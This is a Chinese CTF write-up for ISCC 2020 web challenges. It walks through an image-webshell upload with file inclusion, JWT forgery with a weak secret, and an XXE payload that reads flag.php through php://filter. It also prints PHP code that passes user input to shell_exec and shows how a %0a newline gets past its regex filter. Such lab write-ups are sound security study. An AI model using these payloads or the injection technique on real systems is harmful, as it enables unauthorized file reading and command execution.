iscc2020WEB题WP

web3

在这里插入图片描述
看题目介绍,感觉应该是文件上传

在这里插入图片描述
果然是文件上传
在这里插入图片描述
这里来看的话应该是文件包含漏洞,因为之前我上传php无法绕过只能上传图片
我们首先上传图片马,不做任何绕过操作
在这里插入图片描述
然后用文件包含包含这个图片马
在这里插入图片描述
不知道为什么菜刀连不上
我们直接用hackbar,或者用burp来读取flag,因为我写的一句话是post传参的

在这里插入图片描述
我们cat flag.php
在这里插入图片描述
右键查看源代码

在这里插入图片描述

<?php $a='flag{ISCC_FREAKING_AWESOME}';?>

这题之前被好多大佬恶搞,比如禁权限。。。。。心累

web4

在这里插入图片描述

在这里插入图片描述
打开题目,没啥发现,抓包看一下
在这里插入图片描述

一看到Cookie: token=,应该是伪造jwt

伪造jwt的网站
https://jwt.io/#encoded-jwt
在这里插入图片描述
我们把guest改成user
secret是123456
在这里插入图片描述
我们修改之后返回页面
在这里插入图片描述
发现有一个登陆页面

我们用弱密码登陆一下
在这里插入图片描述

抓包之后
在这里插入图片描述
可以看出是一个xxe漏洞,我们可以利用xxe漏洞来读取任意文件
在这里插入图片描述
我们构造好xxe的格式,发现我们是可以读取到系统文件的,此时我们读一下flag.php
我们发现读取不到php文件
因为PHP的代码可能因为浏览器会解析的原因导致无法显示
我们此时用base64编码来显示
在这里插入图片描述

token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Imd1ZXN0IiwiaWF0IjoxNTg4ODEwODUyLCJqdGkiOiI4MGRlOGFjZGFlMzY5MjZiYWMyMGZmYzkxYTc5MzM5OSJ9.xnFkT2CQ_FC-0UkeLatqpviYCVEW_EpLUVQe8eMO62w

<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<user><username>&f;</username><password>123456</password></user>

我们用base64编码解码一下

<?php $PASSWORD = 'flag{get_the_methodd}'; ?>

发现了flag

阿帅的爱情

在这里插入图片描述
找到网址,加上端口7013
发现是个代码审计,代码如下

<?php
if(!isset($_GET["ip"])){
    show_source(__file__);
} else
{
    $ip=$_GET["ip"];
    $pattern="/[;|&].*[a-zA-Z]+/";
    if(preg_match($pattern,$ip)!=0){
        die('bad domain');
    }
    try {
        $result = shell_exec('ping -c 4 ' . $ip);
    }
    catch(Exception $e) {
        $result = $e->getMessage();
        echo $result;
    }
    $result = str_replace("\n", "<br>", $result);
    echo $result;
}

是个命令执行漏洞,唯一的过滤就是正则,直接用%0a绕过
在这里插入图片描述
发现有个flag.php,读取就是
在这里插入图片描述
今天看了看,,,,,,竟然结束了。。。。。好多WEB还没写复现过程。。。。环境就关了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值